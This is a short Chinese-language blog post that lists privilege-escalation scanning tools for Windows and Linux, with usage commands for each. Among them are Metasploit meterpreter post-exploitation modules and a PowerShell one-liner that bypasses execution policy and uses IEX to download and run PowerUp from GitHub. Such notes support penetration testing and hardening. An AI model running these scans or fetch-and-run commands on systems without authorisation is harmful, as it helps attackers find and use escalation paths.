当前位置:网站首页>提权扫描工具
提权扫描工具
2022-06-30 13:01:00 【西湖第一剑】
1,Windows-Exploit-Suggester
使用Windows-Exploit-Suggester解析systeminfo
https://github.com/AonCyberLabs/Windows-Exploit-Suggester
由于最新版的xlrd对xls的处理方式不同了,导致这个脚本有使用会报错,所以我们使用老版本的xlrd,记得是如下命令
pip2.7 install xlrd==1.2.0
python2 windows-exploit-suggester.py --update
python2 windows-exploit-suggester.py --database 2022-06-07-mssb.xls --systeminfo 1.txt

2,使用Linux-Exploit-Suggester.sh寻找linux提权问题
下载地址:https://github.com/mzet-/linux-exploit-suggester
./linux-exploit-suggester.sh
3,使用Sherlock工具
下载地址:https://github.com/rasta-mouse/Sherlock
Import-Module Sherlock.ps1
Find-AllVulns
4,使用MSF查询补丁和可利用提权漏洞
他妈的发现多次的把目标机进程扫死
meterpreter> run post/windows/gather/enum_patches
meterpreter> run post/multi/recon/local_exploit_suggester
5,使用powerup检查提权漏洞
powershell.exe -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}"
powershell.exe -nop -exec bypass -c "IEX (New-object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1');Invoke-AllChecks"
6,在线网页查询
查询地址:
http://bugs.hacking8.com/tiquan/
http://blog.neargle.com/win-powerup-exp-index/
边栏推荐
- 可觀測,才可靠:雲上自動化運維CloudOps系列沙龍 第一彈
- 点击table的td单元格出现dialog弹窗,获取值后将值放回td单元格
- [the path of system analyst] Chapter 5 Software Engineering (Agile Development)
- [deep anatomy of C language] storage principle of float variable in memory & comparison between pointer variable and "zero value"
- 单元测试效率优化:为什么要对程序进行测试?测试有什么好处?
- 数据库表为什么写不进数据了
- golang模板(text/template)
- Observable, seulement fiable: première bombe de salon de la série cloudops d'exploitation et d'entretien automatisés dans le nuage
- golang基础 —— 切片和数组的区别
- Motor control Clarke( α/β) Derivation of equal amplitude transformation
猜你喜欢

商品服务-平台属性

ABAP toolbox v1.0 (with implementation ideas)

一次 Keepalived 高可用的事故,让我重学了一遍它!

This article explains the concepts of typed array, arraybuffer, typedarray, DataView, etc
![[Title brushing] heater](/img/ee/70e122b1b1a406624aa7c6442fcdc1.png)
[Title brushing] heater

60 个神级 VS Code 插件!!

嵌入式开发:5个可能不再被禁止的C特征

科普达人丨漫画图解什么是eRDMA?

Postman automatically generates curl code snippets

jmeter 学习笔记
随机推荐
There is no utf8 option for creating tables in Navicat database.
[deep anatomy of C language] storage principle of float variable in memory & comparison between pointer variable and "zero value"
Inexplicable error occurred in unity's frequent switching branch result model
Jetpack Compose 实现完美屏幕适配
一条查询SQL是如何执行的
数据库表为什么写不进数据了
资源变现小程序开通微信官方小商店教程
An interesting thing happened in the project
mysql拒绝访问、管理员身份打开的
Resource realization applet opening traffic main tutorial
华为帐号多端协同,打造美好互联生活
WTM major updates, multi tenancy and single sign on
golang 基础 —— 字符串 与 int 、int64 互转
ABAP toolbox v1.0 (with implementation ideas)
On the simplification and acceleration of join operation
SQL attendance statistics monthly report
深度长文探讨Join运算的简化和提速
postman 自动生成 curl 代码片段
Wechat applet reports an error: typeerror: cannot read property 'SetData' of undefined
visualstudio 和sql